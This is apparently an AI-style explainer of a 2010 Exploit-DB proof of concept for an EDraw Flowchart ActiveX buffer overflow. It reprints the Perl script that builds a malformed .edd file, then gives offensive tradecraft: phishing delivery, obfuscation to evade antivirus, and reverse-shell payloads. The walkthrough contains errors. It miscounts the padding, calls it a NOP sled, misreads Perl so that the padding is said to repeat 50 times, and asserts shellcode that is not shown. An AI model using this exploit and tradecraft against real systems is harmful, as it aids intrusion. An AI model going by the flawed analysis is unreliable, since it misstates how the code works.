EDraw Flowchart ActiveX Control 2.3 '.edd parsing' Buffer Overflow Explained

EDraw Flowchart ActiveX Control 2.3 '.edd parsing' Buffer Overflow Explained
What this paper is
This paper details a Proof-of-Concept (PoC) exploit for a buffer overflow vulnerability in the EDraw Flowchart ActiveX Control version 2.3. The vulnerability occurs when the control parses .edd files. Successful exploitation can lead to an application crash and, more importantly, allows an attacker to overwrite memory registers, potentially enabling arbitrary code execution. The exploit is designed to be a local exploit, meaning it requires some form of interaction or access to the vulnerable system.
Simple technical breakdown
The EDraw Flowchart ActiveX Control is a component that allows users to create flowcharts and diagrams within applications. When this control processes a specially crafted .edd file, it doesn't properly check the size of the data it's reading. This leads to a buffer overflow, where more data is written into a memory buffer than it can hold. This overflow corrupts adjacent memory, including critical control flow pointers. The exploit leverages this by overwriting these pointers with attacker-controlled data, including shellcode, to gain execution.
The PoC works by creating a malicious .edd file. This file contains a large amount of data designed to trigger the overflow. The data is structured to overwrite the return address on the stack or other control flow mechanisms, redirecting execution to a payload (shellcode) embedded within the .edd file itself.
Complete code and payload walkthrough
The provided Perl script generates a malicious .edd file. Let's break down the key components:
1. Perl Script Structure:
Shebang and Comments:
#!/usr/bin/perl # ... (Title, Vendor, Product Web Page, Summary, Description, Tested On, Version Tested, Windbg output, Author, Contact, Date, Advisory)This section provides metadata about the exploit, including the vulnerability details, target system, and author information. The Windbg output shows a typical crash scenario (Access violation
c0000005) with specific register values (eax,ebx,ecx,edx,eip,esp,ebp,edi) indicating a memory corruption.edi=41414141is a common indicator of a buffer overflow where 'A' characters are used to fill the buffer.Data Variables:
$pqbdpq: This variable holds the initial part of the malicious.eddfile content. It's a long string of hexadecimal byte sequences.$qpdbqp: This variable holds the final part of the malicious.eddfile content, also a hexadecimal byte string.$dpqpqb: This variable contains a repeating sequence of\x41(ASCII 'A'). This is a common technique to fill a buffer and overwrite adjacent memory with predictable values to confirm the overflow.$bppqqd: This variable defines the filename for the generated malicious.eddfile: "Draw_Totally.edd".
File Generation:
open edd, ">./$bppqqd" || die "\nCan't open $bppqqd: $!"; print edd "$pqbdpq" . "$dpqpqb x 50" . "$qpdbqp"; print "\n ~ Buffering...\n"; sleep 1; close edd; print "\n ~ File $bppqqd ready!\n";This block opens a file named "Draw_Totally.edd" in write mode (
>). It then writes the concatenated content of$pqbdpq, followed by 50 repetitions of$dpqpqb(the 'A' characters), and finally$qpdbqp. This creates the malformed.eddfile. Thesleep 1and print statements provide user feedback.
2. Payload Analysis (Hexadecimal Strings):
The core of the exploit lies within the byte sequences in $pqbdpq and $qpdbqp. Without the original source code of the EDraw ActiveX control, a precise, byte-by-byte analysis of what each specific byte sequence does is challenging. However, we can infer the general purpose based on common buffer overflow exploit structures and the provided Windbg output.
$pqbdpqand$qpdbqp: These strings represent the malformed data that will be parsed by the vulnerable ActiveX control. They are carefully crafted to:- Trigger the Overflow: The initial bytes likely represent valid
.eddfile structure elements, but at some point, the data becomes excessively long or malformed, exceeding the buffer allocated for parsing. - Overwrite Control Flow: The overflow is designed to overwrite critical data on the stack or in other memory regions. This typically includes:
- Return Address: Overwriting the return address on the stack with the address of the shellcode.
- Exception Handler Pointers: Overwriting pointers that the program uses to handle exceptions.
- Embed Shellcode: A portion of these strings likely contains the actual shellcode (the malicious executable code) that will be executed once control flow is redirected. The
\x41characters in$dpqpqbare used to fill the gap between the initial malformed data and the shellcode, ensuring it lands at a predictable location.
- Trigger the Overflow: The initial bytes likely represent valid
$dpqpqb(Repeated 'A's):$dpqpqb = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";This sequence of 96 'A' characters is used as a "no-operation" (NOP) sled or padding. In a typical stack-based buffer overflow, the attacker aims to overwrite the return address with the address of their shellcode. The NOP sled is a series of NOP instructions (like
\x90in x86 assembly) followed by the shellcode. If the overwritten return address points anywhere within the NOP sled, the CPU will execute the NOPs sequentially until it reaches the shellcode, which then executes. In this specific PoC,\x41is used, which is not a NOP instruction. This suggests that the overflow might be overwriting a different control flow mechanism, or the\x41bytes are intended to fill a specific offset to land precisely on the shellcode address. Thex 50in theprint eddcommand means this sequence of 96 'A's is repeated 50 times, creating a very large buffer of 'A's.
3. Shellcode (Inferred):
The exact shellcode is not explicitly presented as a separate, easily identifiable block of bytes. It is embedded within the larger hexadecimal strings of $pqbdpq and $qpdbqp. Based on the "local" keyword and the typical goals of such exploits, the shellcode would likely be designed to:
- Spawn a shell: Open a command prompt (
cmd.exe) on the victim machine. - Download and execute: Fetch a secondary payload from a remote server.
- Perform other actions: Depending on the attacker's objective.
The Windbg output shows eip=10083bbd and mov dword ptr [ecx+4],ebx. This instruction attempts to write the value of ebx (which is 00000000 in this crash) to the memory address pointed to by ecx plus 4. If ecx points to a corrupted structure or a function pointer, this operation could lead to a crash or a jump to an unintended location. The edi=41414141 strongly suggests that the buffer overflow has written 'A's into the edi register, which is often used for destination indexing in string operations or as a general-purpose register. This confirms that the overflow is indeed overwriting data.
Mapping list:
#!/usr/bin/perl: Interpreter directive for the script.# ... (Comments): Explanatory text, metadata, and debugging information.$pqbdpq: First part of the malformed.edddata, likely containing initial structure and part of the overflow/shellcode.$qpdbqp: Second part of the malformed.edddata, likely containing the latter part of the overflow/shellcode.$dpqpqb: A sequence of\x41bytes used for padding/filling the buffer to precisely position the shellcode.$bppqqd: The filename for the generated exploit file ("Draw_Totally.edd").open edd, ">./$bppqqd": Opens the file for writing.print edd "$pqbdpq" . "$dpqpqb x 50" . "$qpdbqp";: Writes the combined payload to the file.close edd;: Closes the file.
Unknowns:
- The exact structure of the
.eddfile format and how the ActiveX control parses it. - The precise memory offset where the overflow occurs and what specific control flow mechanism (e.g., return address, function pointer) is being overwritten.
- The exact bytes that constitute the shellcode.
Practical details for offensive operations teams
- Required Access Level: Local access is required. This means the attacker must already have a foothold on the target system, or the target must be tricked into opening the malicious
.eddfile (e.g., via email attachment, shared drive). - Lab Preconditions:
- A Windows machine with EDraw Flowchart installed.
- Specifically, EDraw Flowchart ActiveX Control version 2.3.0.6 or a similarly vulnerable version.
- A debugger (like WinDbg) is highly recommended for analyzing the crash and confirming the exploit's behavior.
- The Perl interpreter to run the PoC script.
- Tooling Assumptions:
- Perl interpreter for script execution.
- A text editor to view/modify the script.
- A debugger (WinDbg) for analysis.
- The vulnerable EDraw Flowchart application.
- Execution Pitfalls:
- Version Dependency: The exploit is highly dependent on the specific version of the ActiveX control. Newer versions or patched systems will not be vulnerable.
- Antivirus/EDR: The generated
.eddfile or the shellcode within it might be detected by security software. - Environment Differences: The exact memory layout and addresses can vary slightly between Windows versions and service packs, potentially requiring adjustments to the payload.
- File Association: The user must be convinced to open the
.eddfile with an application that uses the vulnerable ActiveX control. - ActiveX Security Settings: Browser or application security settings might prevent the ActiveX control from loading or executing, even if the file is opened.
- Tradecraft Considerations:
- Staging: The
.eddfile would need to be delivered to the target system. This could be via phishing, social engineering, or exploiting another vulnerability to gain initial access. - Obfuscation: The Perl script and the byte sequences within it might need obfuscation to evade detection by security tools.
- Payload Customization: The shellcode would need to be tailored to the specific objective (e.g., reverse shell, meterpreter stager).
- Staging: The
- Likely Failure Points:
- The target system does not have the vulnerable version of EDraw Flowchart installed.
- Security software (AV/EDR) detects and blocks the malicious
.eddfile or the execution of the shellcode. - The user does not open the
.eddfile. - The ActiveX control is disabled or sandboxed by security policies.
- The exploit payload is not correctly aligned with the overwritten control flow pointer, leading to a crash instead of code execution.
Where this was used and when
- Context: This exploit targets an ActiveX control, which was commonly embedded in web pages or desktop applications that used COM (Component Object Model) technology. The vulnerability would be triggered when a user opened a specially crafted
.eddfile, likely through a desktop application that integrated the EDraw ActiveX control. - Approximate Years/Dates: The paper was published on April 22, 2010. Therefore, this vulnerability and exploit would have been relevant around 2010 and potentially a few years prior, depending on when the software was deployed and when the vulnerability was introduced. ActiveX vulnerabilities were more prevalent in the late 1990s and 2000s before modern web security practices and browser deprecation of ActiveX.
Defensive lessons for modern teams
- ActiveX is Legacy and Risky: Modern systems should avoid using ActiveX controls. They are a significant security risk due to their age, complexity, and historical vulnerability. If legacy applications absolutely require them, they should be run in highly isolated environments.
- Input Validation is Crucial: This exploit highlights the fundamental importance of robust input validation. All data processed by applications, especially from external sources (files, network), must be validated for size, format, and content to prevent buffer overflows and other parsing-related vulnerabilities.
- Memory Corruption Vulnerabilities: Understanding memory corruption vulnerabilities (buffer overflows, use-after-free, etc.) is essential for both offensive and defensive security. Defensive measures include:
- Safe Coding Practices: Using memory-safe languages and libraries where possible.
- Compiler Protections: Enabling compiler-level protections like ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), and Stack Canaries.
- Runtime Security: Employing EDR solutions that can detect anomalous memory access patterns or suspicious process behavior.
- Patch Management: Keeping software, including third-party components like ActiveX controls, up-to-date is critical. Vendors often release patches to fix such vulnerabilities.
- Least Privilege: Running applications and user accounts with the minimum necessary privileges can limit the impact of a successful exploit. If an attacker gains code execution, they will have fewer privileges to leverage.
ASCII visual (if applicable)
This exploit is primarily file-based and targets a specific application component. A simple flow diagram can illustrate the process:
+-------------------+ +---------------------+ +---------------------+
| Attacker creates | --> | Malicious .edd file | --> | Target System |
| Malicious .edd | | (Overflow Data + | | (EDraw Flowchart |
| File (Perl script)| | Shellcode) | | ActiveX Control) |
+-------------------+ +---------------------+ +----------+----------+
|
| Parses .edd file
v
+---------------------+
| Buffer Overflow |
| occurs |
+----------+----------+
|
| Overwrites control
| flow (e.g., EIP)
v
+---------------------+
| Execution jumps to |
| Shellcode |
+---------------------+
|
v
+---------------------+
| Arbitrary Code |
| Execution |
+---------------------+Source references
- Paper ID: 12342
- Paper Title: EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow
- Author: LiquidWorm
- Published: 2010-04-22
- Keywords: Windows, local
- Paper URL: https://www.exploit-db.com/papers/12342
- Raw URL: https://www.exploit-db.com/raw/12342
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl
#
#
# Title: EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC
#
#
# Vendor: EdrawSoft
#
# Product Web Page: http://www.edrawsoft.com
#
# Summary: Do you want to learn how to draw? Now you can online! Learn how to draw like a
# local application with Edraw Flowchart ActiveX Control that lets you quickly
# build basic flowcharts, organizational charts, business charts, hr diagram,
# work flow, programming flowchart and network diagrams.
#
# Description: EDraw Flowchart ActiveX Control version 2.3 suffers from a buffer overflow
# vulnerability when parsing .edd file format resulting in an application
# crash and overwritten few memory registers which can aid the attacker to
# execute arbitrary code.
#
# Tested On: Microsoft Windows XP Professional SP3 (EN)
#
# Version Tested: 2.3.0.6
#
#
# Windbg:
# --------------------------------------------------------------------------------------
#
# (305c.1ee4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=027a0020 ebx=00000000 ecx=0c841000 edx=3fffff45 esi=0012f2e4 edi=41414141
# eip=10083bbd esp=0012f198 ebp=01055734 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# EDImage!DllUnregisterServer+0x5594d:
# 10083bbd 895904 mov dword ptr [ecx+4],ebx ds:0023:0c841004=????????
#
# --------------------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
#
# liquidworm gmail com
#
#
#
# 20.04.2010
#
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4935.php
#
#
$pqbdpq = "\x00\x0C\x00\x00\x00\x00\x00\x00\x00\x33\x73\x46\x44\x1F\x55\x8C\x44\x00".
"\x00\x3D\x43\x00\x00\x3D\x43\x00\x00\x3D\x43\x00\x00\x3D\x43\x00\x00\x80".
"\x3F\xFF\xFF\xFF\xFF\xFF\x90\x99\xAE\xFF\x6C\x72\x82\x02\x00\x00\x00\x01".
"\x00\x00\x00\xFF\xFF\x00\x03\xFF\x22\x37\xEA\x01\x00\x00\x00\xFF\xAD\xD8".
"\xE6\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x3F\x02\x00\x00\x00\x01".
"\x00\x00\x00\xFF\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x42\x43\x1F\xF5\xA3".
"\x44\x33\x73\x46\x44\x00\x00\xA0\x40\x33\xB3\x75\x44\x00\x00\x42\x43\x00".
"\x00\xA0\x40\x1F\x55\x8C\x44\x00\x00\x3D\x43\x00\x00\x3D\x43\x33\x73\x46".
"\x44\x1F\x55\x8C\x44\x00\x01\x00\xFF\xFF\x00\x00\x06\x00\x43\x53\x52\x65".
"\x63\x74\x01\x00\x00\xA8\x2C\x02\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x00\x55\x01\x00\x00\xD7\x01\x00\x00\xDC\x01\x00\x00\x76\x02".
"\x00\x00\x00\x00\xAE\x43\x00\x00\xFB\x43\x00\x00\xEA\x43\x00\x80\x1B\x44".
"\x00\x00\xCC\x43\x00\x80\x1B\x44\x00\x00\x80\x3F\x00\x00\x80\x3F\x00\x00".
"\x80\x3F\x00\x00\x80\x3F\x00\x00\x80\x3F\x00\x00\x80\x3F\x00\x00\x80\x3F".
"\x00\x00\xF0\x42\x00\x00\xF0\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xCC\x43\x00\x80\x0C\x44\x08\x00\x00\x00\x06\x43\x53\x52\x65\x63\x74\x00".
"\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x06\x31\x30\x30\x31\x2C\x32\x00\xFF".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x80\x3F\x00\x00\x00\x00\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00".
"\xFF\x00\x00\x00\x00\x00\x80\x3F\x01\x00\x00\x00\x00\x00\x00\x00\xFF\x00".
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00".
"\x00\xFF\x02\x00\x00\x00\xFE\xFF\xFF\xFF\xFF\x00\x00\x00\xFF\xFF\xFF\xFF".
"\x00\x00\x01\x00\xFF\xFF\x00\x00\x08\x00\x43\x54\x65\x78\x74\x4F\x62\x6A".
"\x00\x00\x01\x20\x2D\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x20\x44\x00\x00\x20\x44\x00\x00\x3E\x44\x00\x00\x3E\x44\x00\x00".
"\x2F\x44\x00\x00\x3E\x44\x00\x00\x80\x3F\x00\x00\x80\x3F\x00\x00\x80\x3F".
"\x00\x00\x80\x3F\x00\x00\x80\x3F\x00\x00\x80\x3F\x00\x00\x80\x3F\x00\x00".
"\xE6\x42\x00\x00\xE6\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCC\x43".
"\x00\x80\x0C\x44\x00\x00\x00\x00\x08\x43\x54\x65\x78\x74\x4F\x62\x6A\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
"\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00".
"\x80\x3F\x01\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x00\x00\x00\x02\x00\x00".
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xFF\x02\x00\x00\x00".
"\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00".
"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\xCC\x43\x00\x40\xFC\x43\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x40\xAF\x43\x00\x40".
"\xFC\x43\x01\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x00\xCC\x43\x00\x40\xFC\x43\x01\x00\x00\x00\x20\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\xC0\xE8\x43".
"\x00\x40\xFC\x43\x01\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x04\x00\x00\x00\x00\xC0\xE8\x43\x00\x80\x0C\x44\x01\x00\x00\x00".
"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00";
$qpdbqp = "\xC0\xE8\x43\x00\xE0\x1A\x44\x01\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\xCC\x43\x00\xE0\x1A\x44\x01".
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00".
"\x00\x00\x40\xAF\x43\x00\xE0\x1A\x44\x01\x00\x00\x00\x20\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x40\xAF\x43\x00\x80\x0C".
"\x44\x01\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".
"\x00\x00\x00\x00\x00\xCC\x43\x00\xC0\xEF\x43\x01\x00\x00\x00\x40\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\xCC\x43\x00".
"\x80\x0C\x44\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x25\x0D\x10\xFF\x00\x00\x00".
"\xFF\xFF\xFF\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xCB\xCE\xCC\xE5\x0A".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x05".
"\x00\x00\x00\x00\x00\x00\xCC\x43\x00\x00\xFB\x43\x01\x00\x00\xEA\x43\x00".
"\xC0\x08\x44\x01\x00\x80\xE2\x43\x00\x80\x1B\x44\x01\x00\x80\xB5\x43\x00".
"\x80\x1B\x44\x81\x00\x00\xAE\x43\x00\xC0\x08\x44\x10\x00\x00\x00\x00\x00".
"\x00\x00\xCC\x43\x00\x00\xFB\x43\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00".
"\xFF\xFF\x00\x00\x07\x00\x43\x43\x74\x72\x6C\x50\x74\x04\x00\x00\x00\x00".
"\x00\xCC\x43\x00\x00\xFB\x43\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\xBF\x05\x80\x04\x00\x00\x00\x00\x00\xAE\x43\x00\xC0\x08".
"\x44\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\xBF\x00\x00\x00\xBE\x05".
"\x80\x04\x00\x00\x00\x00\x00\xEA\x43\x00\xC0\x08\x44\x01\x00\x00\x00\x02".
"\x00\x00\x00\x00\x00\x00\x3F\x00\x00\x00\xBE\x05\x80\x04\x00\x00\x00\x00".
"\x80\xB5\x43\x00\x80\x1B\x44\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\xC0".
"\xBE\x00\x00\x00\x3F\x05\x80\x04\x00\x00\x00\x00\x80\xE2\x43\x00\x80\x1B".
"\x44\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\xC0\x3E\x00\x00\x00\x3F\x04".
"\x00\x00\x00\x00\x00\xAE\x43\x00\x00\xFB\x43\x01\x00\x00\x00\x20\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\xCC\x43\x00".
"\x00\xFB\x43\x01\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x04\x00\x00\x00\x00\x00\xEA\x43\x00\x00\xFB\x43\x01\x00\x00\x00\x20".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\xEA".
"\x43\x00\x80\x0C\x44\x01\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\xEA\x43\x00\x80\x1B\x44\x01\x00\x00".
"\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00".
"\x00\xCC\x43\x00\x80\x1B\x44\x01\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\xAE\x43\x00\x80\x1B\x44\x01".
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00".
"\x00\x00\x00\xAE\x43\x00\x80\x0C\x44\x01\x00\x00\x00\x20\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\xCC\x43\x00\x80\xEE".
"\x43\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".
"\x00\x00\x00\x00\x00\xCC\x43\x00\x80\x0C\x44\x03\x00\x00\x00\x01\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dpqpqb = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
$bppqqd = "Draw_Totally.edd";
open edd, ">./$bppqqd" || die "\nCan't open $bppqqd: $!";
print edd "$pqbdpq" . "$dpqpqb x 50" . "$qpdbqp";
print "\n ~ Buffering...\n"; sleep 1;
close edd;
print "\n ~ File $bppqqd ready!\n";